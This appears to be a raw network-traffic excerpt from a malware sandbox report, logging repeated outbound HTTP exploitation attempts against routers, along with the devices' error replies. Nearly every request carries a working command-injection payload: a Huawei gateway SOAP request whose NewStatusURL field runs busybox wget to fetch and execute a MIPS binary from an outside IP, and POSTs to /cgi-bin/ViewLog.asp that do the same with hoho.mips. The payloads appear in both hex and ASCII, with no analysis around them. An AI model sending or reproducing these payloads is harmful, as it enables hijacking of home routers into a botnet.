                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              723192.168.2.143605041.62.237.6237215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.887851000 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              724192.168.2.144647294.29.73.1598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.890652895 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.102966070 CET417INHTTP/1.1 403 Forbidden
                                              Server: Web server
                                              Date: Thu, 23 Nov 2023 04:18:13 GMT
                                              Content-Type: text/html
                                              Content-Length: 151
                                              Connection: keep-alive
                                              X-Detail: 0x1210, insufficient security level
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              725192.168.2.144977094.122.198.1168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.902218103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              726192.168.2.144772694.154.84.758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.139904976 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.616672993 CET525INHTTP/1.1 401 Unauthorized
                                              Server: Web server
                                              Date: Thu, 23 Nov 2023 04:18:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 193
                                              Connection: keep-alive
                                              WWW-Authenticate: Digest realm="ZyXEL Keenetic 4G III", nonce="stNeZf3MnzfdhhjDfZ1Oie9Vz0APqofq", qop="auth"
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>Web server</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              727192.168.2.145360685.92.113.458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.638183117 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.792635918 CET454INHTTP/1.1 400 Bad Request
                                              Server: WAF
                                              Date: Thu, 23 Nov 2023 04:18:16 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: waf_404=151c2610-8453-4f4a-8b1f-273b0691f96f; Max-Age=300; Path=/; HttpOnly
                                              Cache-Control: no-cache, no-store
                                              x-frame-options: sameorigin
                                              Data Raw: 35 36 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 27 2f 68 6f 73 74 5f 6e 6f 74 5f 66 6f 75 6e 64 5f 65 72 72 6f 72 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 56<html><body><script>document.location='/host_not_found_error';</script></body></html>0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              728192.168.2.145269231.136.120.708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.669437885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.248892069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.401869059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.800741911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              729192.168.2.144744485.3.36.538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.672386885 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.860632896 CET94INHTTP/1.0 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              730192.168.2.145044231.136.113.1868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.854835033 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.440896034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.592845917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.056756973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              731192.168.2.145326831.136.158.2228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.856250048 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.440895081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.592845917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.056734085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              732192.168.2.1440022156.253.40.24137215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.917737007 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 